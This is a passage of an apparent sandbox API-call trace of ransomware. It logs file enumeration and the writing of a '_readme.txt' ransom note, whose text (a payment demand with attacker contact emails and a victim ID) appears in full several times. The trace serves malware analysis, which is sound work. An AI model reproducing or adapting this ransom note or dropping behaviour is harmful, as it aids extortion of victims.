Flags=0x0, Size=0x20) returned 0x328eba8 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ecc0 [0056.085] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ef18 [0056.085] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x310) returned 0x32997c0 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ea40 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eea0 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eb08 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e478 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee28 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328d870 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eab8 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edd8 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ef68 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e6d0 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed10 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e4f0 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e6f8 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec70 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328efb8 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ea18 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e4c8 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e568 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e7c0 [0056.086] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ecc0 [0056.086] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e860 [0056.086] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e630 [0056.086] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0056.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.087] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.087] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.087] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea15050, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea15050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea15050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.087] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea15050, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea15050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea15050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.087] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.087] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.087] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.087] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.087] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0056.087] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.087] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.087] PathFindFileNameW (pszPath="") returned="" [0056.087] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.087] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.087] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.087] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.088] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.088] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5da58 [0056.088] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee50 [0056.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.088] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e590 [0056.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eba8 | out: hHeap=0x660000) returned 1 [0056.088] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee50 | out: hHeap=0x660000) returned 1 [0056.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e590 | out: hHeap=0x660000) returned 1 [0056.088] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e590 [0056.088] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81c) returned 0x9c5da58 [0056.088] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0056.088] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e590 | out: hHeap=0x660000) returned 1 [0056.088] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0056.089] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.089] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.089] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.089] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.089] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.089] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.089] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x326aa18 [0056.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326aa18, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.089] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x32acff0 [0056.089] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.089] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.089] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.089] WriteFile (in: hFile=0x5c8, lpBuffer=0x32acff0*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x32acff0*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.090] CloseHandle (hObject=0x5c8) returned 1 [0056.090] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.090] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.090] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.090] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.090] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e590 [0056.091] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x1ea3b1b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea3b1b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.091] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e590 | out: hHeap=0x660000) returned 1 [0056.091] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x1ea3b1b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea3b1b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.091] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea3b1b0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea3b1b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea3b1b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.091] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea3b1b0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea3b1b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea3b1b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.091] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.091] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.091] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.091] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e2e8 | out: hHeap=0x660000) returned 1 [0056.091] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0056.091] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.091] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0056.091] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.091] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.091] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0056.091] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0056.091] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.091] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.091] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0056.091] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0056.091] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.091] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.091] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, 